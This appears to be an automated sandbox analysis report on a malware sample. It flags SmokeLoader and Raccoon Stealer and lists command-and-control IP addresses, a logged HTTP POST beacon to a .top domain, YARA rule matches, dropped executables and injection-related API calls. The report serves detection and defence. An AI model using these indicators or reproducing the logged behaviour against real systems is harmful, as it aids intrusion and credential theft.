6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 216.128.137.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 93.115.20.139
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.181
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbqwgqd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: hajezey1.top
                      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.7:49810 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.7:49813 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 81.177.141.36:443 -> 192.168.2.7:49817 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 0.2.SYzU0M7gx6.exe.2be15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.dtrsehc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.3C9D.exe.3080e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.dtrsehc.2be15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.SYzU0M7gx6.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.1.dtrsehc.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.SYzU0M7gx6.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.1.9A51.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.9A51.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.3.3C9D.exe.3090000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.3C9D.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.9A51.exe.2bf15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.306623599.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.455599908.0000000004910000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.368282987.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.368357098.00000000005B1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.432262318.0000000003090000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.433825471.0000000004B61000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.413492109.0000000003090000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.306542749.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000000.288440777.0000000002861000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.456636829.0000000004A41000.00000004.00020000.sdmp, type: MEMORY
                      Source: 2049.exe, 0000001C.00000002.502796299.0000000000C50000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      barindex
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 37.3.B644.exe.4850000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.3.B644.exe.4850000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000025.00000003.445981143.0000000004850000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: B644.exe PID: 6896, type: MEMORYSTR

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 3113.exe.7.dr, ???????????????.csLarge array initialization: System.Byte[] ???????????????::???????????????: array initializer size 8704
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeCode function: 28_2_059C019028_2_059C0190
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeCode function: 28_2_059C018F28_2_059C018F
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA30930_2_6B1FA309
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FAB4030_2_6B1FAB40
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F336030_2_6B1F3360
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20EBB030_2_6B20EBB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B27EB8A30_2_6B27EB8A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B228BE830_2_6B228BE8
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2823E330_2_6B2823E3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20ABD830_2_6B20ABD8
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28FA2B30_2_6B28FA2B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A32A930_2_6B2A32A9
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294AEF30_2_6B294AEF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B29E2C530_2_6B29E2C5
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F412030_2_6B1F4120
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F299030_2_6B1F2990
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F99BF30_2_6B1F99BF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D680030_2_6B1D6800
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B29100230_2_6B291002
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FA83030_2_6B1FA830
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20884030_2_6B208840
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1EB09030_2_6B1EB090
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B202F7030_2_6B202F70
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2967E230_2_6B2967E2
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F6E3030_2_6B1F6E30
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B25AE6030_2_6B25AE60
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A2EF730_2_6B2A2EF7
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D0D2030_2_6B1D0D20
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F2D5030_2_6B1F2D50
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A1D5530_2_6B2A1D55
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2035D030_2_6B2035D0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F243030_2_6B1F2430
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DEC9B30_2_6B1DEC9B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B29449630_2_6B294496
                      Source: 3C9D.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 3C9D.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 3C9D.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 3C9D.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 3C9D.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 3C9D.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 3C9D.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: gjrsehc.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: gjrsehc.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: gjrsehc.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: gjrsehc.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: gjrsehc.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: gjrsehc.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: gjrsehc.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.28.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.28.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: SYzU0M7gx6.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: 29.0.3113.exe.a80000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: 28.0.2049.exe.570000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: 29.0.3113.exe.a80000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: 31.0.5508.exe.f70000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: 28.0.2049.exe.570000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: 29.0.3113.exe.a80000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: 28.2.2049.exe.570000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: 28.0.2049.exe.570000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: 31.0.5508.exe.f70000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: 31.0.5508.exe.f70000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: 31.0.5508.exe.f70000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: 29.0.3113.exe.a80000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: 28.0.2049.exe.570000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: C:\Users\user\AppData\Local\Temp\3113.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: C:\Users\user\AppData\Local\Temp\5508.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: C:\Users\user\AppData\Local\Temp\2049.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: String function: 6B22D08C appears 41 times
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: String function: 6B265720 appears 76 times
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: String function: 6B1DB150 appears 128 times
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 3_2_0040185B Sleep,NtTerminateProcess,3_2_0040185B
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 3_2_00401866 Sleep,NtTerminateProcess,3_2_00401866
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 3_2_0040187A Sleep,NtTerminateProcess,3_2_0040187A
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 3_2_0040163B NtMapViewOfSection,3_2_0040163B
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 3_2_004018D3 NtTerminateProcess,3_2_004018D3
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 3_2_00401884 Sleep,NtTerminateProcess,3_2_00401884
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 3_2_00401888 NtTerminateProcess,3_2_00401888
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 3_2_0040156A NtMapViewOfSection,3_2_0040156A
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 3_2_004015DB NtMapViewOfSection,NtMapViewOfSection,3_2_004015DB
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 3_2_004017EA Sleep,NtTerminateProcess,3_2_004017EA
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 3_1_0040156A NtMapViewOfSection,3_1_0040156A
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 3_1_004015DB NtMapViewOfSection,NtMapViewOfSection,3_1_004015DB
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 3_1_0040163B NtMapViewOfSection,3_1_0040163B
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeCode function: 20_2_0040185B Sleep,NtTerminateProcess,20_2_0040185B
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeCode function: 20_2_00401866 Sleep,NtTerminateProcess,20_2_00401866
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeCode function: 20_2_0040187A Sleep,NtTerminateProcess,20_2_0040187A
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeCode function: 20_2_0040163B NtMapViewOfSection,20_2_0040163B
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeCode function: 20_2_004018D3 NtTerminateProcess,20_2_004018D3
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeCode function: 20_2_00401884 Sleep,NtTerminateProcess,20_2_00401884
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeCode function: 20_2_00401888 NtTerminateProcess,20_2_00401888
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeCode function: 20_2_0040156A NtMapViewOfSection,20_2_0040156A
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeCode function: 20_2_004015DB NtMapViewOfSection,NtMapViewOfSection,20_2_004015DB
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeCode function: 20_2_004017EA Sleep,NtTerminateProcess,20_2_004017EA
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeCode function: 20_1_0040156A NtMapViewOfSection,20_1_0040156A
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeCode function: 20_1_004015DB NtMapViewOfSection,NtMapViewOfSection,20_1_004015DB
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeCode function: 20_1_0040163B NtMapViewOfSection,20_1_0040163B
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeCode function: 28_2_059C1340 NtUnmapViewOfSection,28_2_059C1340
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeCode function: 28_2_059C1C00 NtWriteVirtualMemory,28_2_059C1C00
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeCode function: 28_2_059C2538 NtResumeThread,28_2_059C2538
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeCode function: 28_2_059C13F8 NtAllocateVirtualMemory,28_2_059C13F8
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeCode function: 28_2_059C0FD8 NtUnmapViewOfSection,28_2_059C0FD8
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeCode function: 28_2_059C2270 NtResumeThread,28_2_059C2270
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeCode function: 28_2_059C25E9 NtResumeThread,28_2_059C25E9
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeCode function: 28_2_059C1B20 NtAllocateVirtualMemory,28_2_059C1B20
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_0040181C Sleep,NtTerminateProcess,30_2_0040181C
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_00402406 NtEnumerateKey,30_2_00402406
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_00401F25 NtQuerySystemInformation,30_2_00401F25
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_00401828 Sleep,NtTerminateProcess,30_2_00401828
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_00402431 NtEnumerateKey,30_2_00402431
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_004017DA Sleep,NtTerminateProcess,30_2_004017DA
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_004017F8 NtTerminateProcess,30_2_004017F8
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_0040209A NtQuerySystemInformation,30_2_0040209A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_004017A3 Sleep,NtTerminateProcess,30_2_004017A3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2199A0 ZwCreateSection,LdrInitializeThunk,30_2_6B2199A0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219820 ZwEnumerateKey,LdrInitializeThunk,30_2_6B219820
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219860 ZwQuerySystemInformation,LdrInitializeThunk,30_2_6B219860
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2198C0 ZwDuplicateObject,LdrInitializeThunk,30_2_6B2198C0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219780 ZwMapViewOfSection,LdrInitializeThunk,30_2_6B219780
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219600 ZwOpenKey,LdrInitializeThunk,30_2_6B219600
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219660 ZwAllocateVirtualMemory,LdrInitializeThunk,30_2_6B219660
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21967A NtQueryInformationProcess,LdrInitializeThunk,30_2_6B21967A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D4B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory,30_2_6B1D4B00
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219B00 ZwSetValueKey,30_2_6B219B00
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B205306 ZwReleaseKeyedEvent,30_2_6B205306
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D9335 ZwClose,ZwClose,30_2_6B1D9335
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B29131B RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B29131B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B257365 RtlRunOnceExecuteOnce,ZwQuerySystemInformation,RtlCaptureContext,memset,RtlReportException,30_2_6B257365
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21AB60 ZwReleaseKeyedEvent,30_2_6B21AB60
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B286369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose,30_2_6B286369
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B266365 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy,30_2_6B266365
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21AB70 ZwReleaseWorkerFactoryWorker,30_2_6B21AB70
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B268372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString,30_2_6B268372
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B203B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap,30_2_6B203B7A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2B7E ZwSetInformationThread,ZwClose,30_2_6B1D2B7E
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B203B48 ZwClose,ZwClose,30_2_6B203B48
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8B58 RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B2A8B58
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E6B6B ZwQueryAttributesFile,RtlDeleteBoundaryDescriptor,30_2_6B1E6B6B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21A3A0 ZwGetCompleteWnfStateSubscription,30_2_6B21A3A0
